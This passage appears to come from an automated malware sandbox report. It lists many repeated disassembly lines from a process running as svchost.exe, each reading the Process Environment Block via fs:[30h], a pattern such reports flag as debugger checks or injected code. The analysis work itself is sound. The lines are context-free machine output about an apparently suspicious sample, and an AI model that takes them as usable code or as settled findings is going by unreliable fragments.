            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE609 mov eax, dword ptr fs:[00000030h]1_2_038AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872619 mov eax, dword ptr fs:[00000030h]1_2_03872619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E627 mov eax, dword ptr fs:[00000030h]1_2_0384E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03866620 mov eax, dword ptr fs:[00000030h]1_2_03866620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868620 mov eax, dword ptr fs:[00000030h]1_2_03868620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383262C mov eax, dword ptr fs:[00000030h]1_2_0383262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384C640 mov eax, dword ptr fs:[00000030h]1_2_0384C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F866E mov eax, dword ptr fs:[00000030h]1_2_038F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F866E mov eax, dword ptr fs:[00000030h]1_2_038F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A660 mov eax, dword ptr fs:[00000030h]1_2_0386A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A660 mov eax, dword ptr fs:[00000030h]1_2_0386A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03862674 mov eax, dword ptr fs:[00000030h]1_2_03862674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03832582 mov eax, dword ptr fs:[00000030h]1_2_03832582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03832582 mov ecx, dword ptr fs:[00000030h]1_2_03832582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03864588 mov eax, dword ptr fs:[00000030h]1_2_03864588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E59C mov eax, dword ptr fs:[00000030h]1_2_0386E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h]1_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h]1_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h]1_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038545B1 mov eax, dword ptr fs:[00000030h]1_2_038545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038545B1 mov eax, dword ptr fs:[00000030h]1_2_038545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E5CF mov eax, dword ptr fs:[00000030h]1_2_0386E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E5CF mov eax, dword ptr fs:[00000030h]1_2_0386E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038365D0 mov eax, dword ptr fs:[00000030h]1_2_038365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A5D0 mov eax, dword ptr fs:[00000030h]1_2_0386A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A5D0 mov eax, dword ptr fs:[00000030h]1_2_0386A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038325E0 mov eax, dword ptr fs:[00000030h]1_2_038325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C5ED mov eax, dword ptr fs:[00000030h]1_2_0386C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C5ED mov eax, dword ptr fs:[00000030h]1_2_0386C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C6500 mov eax, dword ptr fs:[00000030h]1_2_038C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838550 mov eax, dword ptr fs:[00000030h]1_2_03838550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838550 mov eax, dword ptr fs:[00000030h]1_2_03838550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386656A mov eax, dword ptr fs:[00000030h]1_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386656A mov eax, dword ptr fs:[00000030h]1_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386656A mov eax, dword ptr fs:[00000030h]1_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EA49A mov eax, dword ptr fs:[00000030h]1_2_038EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038364AB mov eax, dword ptr fs:[00000030h]1_2_038364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038644B0 mov ecx, dword ptr fs:[00000030h]1_2_038644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BA4B0 mov eax, dword ptr fs:[00000030h]1_2_038BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038304E5 mov ecx, dword ptr fs:[00000030h]1_2_038304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868402 mov eax, dword ptr fs:[00000030h]1_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868402 mov eax, dword ptr fs:[00000030h]1_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868402 mov eax, dword ptr fs:[00000030h]1_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h]1_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h]1_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h]1_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C427 mov eax, dword ptr fs:[00000030h]1_2_0382C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EA456 mov eax, dword ptr fs:[00000030h]1_2_038EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382645D mov eax, dword ptr fs:[00000030h]1_2_0382645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385245A mov eax, dword ptr fs:[00000030h]1_2_0385245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BC460 mov ecx, dword ptr fs:[00000030h]1_2_038BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h]1_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h]1_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h]1_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840BBE mov eax, dword ptr fs:[00000030h]1_2_03840BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840BBE mov eax, dword ptr fs:[00000030h]1_2_03840BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E4BB0 mov eax, dword ptr fs:[00000030h]1_2_038E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E4BB0 mov eax, dword ptr fs:[00000030h]1_2_038E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h]1_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h]1_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h]1_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h]1_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h]1_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h]1_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DEBD0 mov eax, dword ptr fs:[00000030h]1_2_038DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h]1_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h]1_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h]1_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EBFC mov eax, dword ptr fs:[00000030h]1_2_0385EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BCBF0 mov eax, dword ptr fs:[00000030h]1_2_038BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904B00 mov eax, dword ptr fs:[00000030h]1_2_03904B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EB20 mov eax, dword ptr fs:[00000030h]1_2_0385EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EB20 mov eax, dword ptr fs:[00000030h]1_2_0385EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F8B28 mov eax, dword ptr fs:[00000030h]1_2_038F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F8B28 mov eax, dword ptr fs:[00000030h]1_2_038F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E4B4B mov eax, dword ptr fs:[00000030h]1_2_038E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E4B4B mov eax, dword ptr fs:[00000030h]1_2_038E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]1_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]1_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]1_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]1_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C6B40 mov eax, dword ptr fs:[00000030h]1_2_038C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C6B40 mov eax, dword ptr fs:[00000030h]1_2_038C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FAB40 mov eax, dword ptr fs:[00000030h]1_2_038FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D8B42 mov eax, dword ptr fs:[00000030h]1_2_038D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828B50 mov eax, dword ptr fs:[00000030h]1_2_03828B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DEB50 mov eax, dword ptr fs:[00000030h]1_2_038DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382CB7E mov eax, dword ptr fs:[00000030h]1_2_0382CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904A80 mov eax, dword ptr fs:[00000030h]1_2_03904A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868A90 mov edx, dword ptr fs:[00000030h]1_2_03868A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838AA0 mov eax, dword ptr fs:[00000030h]1_2_03838AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838AA0 mov eax, dword ptr fs:[00000030h]1_2_03838AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03886AA4 mov eax, dword ptr fs:[00000030h]1_2_03886AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h]1_2_03886ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h]1_2_03886ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h]1_2_03886ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830AD0 mov eax, dword ptr fs:[00000030h]1_2_03830AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03864AD0 mov eax, dword ptr fs:[00000030h]1_2_03864AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03864AD0 mov eax, dword ptr fs:[00000030h]1_2_03864AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386AAEE mov eax, dword ptr fs:[00000030h]1_2_0386AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386AAEE mov eax, dword ptr fs:[00000030h]1_2_0386AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BCA11 mov eax, dword ptr fs:[00000030h]1_2_038BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386CA24 mov eax, dword ptr fs:[00000030h]1_2_0386CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EA2E mov eax, dword ptr fs:[00000030h]1_2_0385EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03854A35 mov eax, dword ptr fs:[00000030h]1_2_03854A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03854A35 mov eax, dword ptr fs:[00000030h]1_2_03854A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840A5B mov eax, dword ptr fs:[00000030h]1_2_03840A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840A5B mov eax, dword ptr fs:[00000030h]1_2_03840A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386CA6F mov eax, dword ptr fs:[00000030h]1_2_0386CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386CA6F mov eax, dword ptr fs:[00000030h]1_2_0386CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386CA6F mov eax, dword ptr fs:[00000030h]1_2_0386CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DEA60 mov eax, dword ptr fs:[00000030h]1_2_038DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038ACA72 mov eax, dword ptr fs:[00000030h]1_2_038ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038ACA72 mov eax, dword ptr fs:[00000030h]1_2_038ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038309AD mov eax, dword ptr fs:[00000030h]1_2_038309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038309AD mov eax, dword ptr fs:[00000030h]1_2_038309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B89B3 mov esi, dword ptr fs:[00000030h]1_2_038B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B89B3 mov eax, dword ptr fs:[00000030h]1_2_038B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B89B3 mov eax, dword ptr fs:[00000030h]1_2_038B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C69C0 mov eax, dword ptr fs:[00000030h]1_2_038C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]1_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]1_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]1_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]1_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]1_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]1_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038649D0 mov eax, dword ptr fs:[00000030h]1_2_038649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FA9D3 mov eax, dword ptr fs:[00000030h]1_2_038FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BE9E0 mov eax, dword ptr fs:[00000030h]1_2_038BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038629F9 mov eax, dword ptr fs:[00000030h]1_2_038629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038629F9 mov eax, dword ptr fs:[00000030h]1_2_038629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE908 mov eax, dword ptr fs:[00000030h]1_2_038AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE908 mov eax, dword ptr fs:[00000030h]1_2_038AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BC912 mov eax, dword ptr fs:[00000030h]1_2_038BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828918 mov eax, dword ptr fs:[00000030h]1_2_03828918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828918 mov eax, dword ptr fs:[00000030h]1_2_03828918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B892A mov eax, dword ptr fs:[00000030h]1_2_038B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C892B mov eax, dword ptr fs:[00000030h]1_2_038C892B
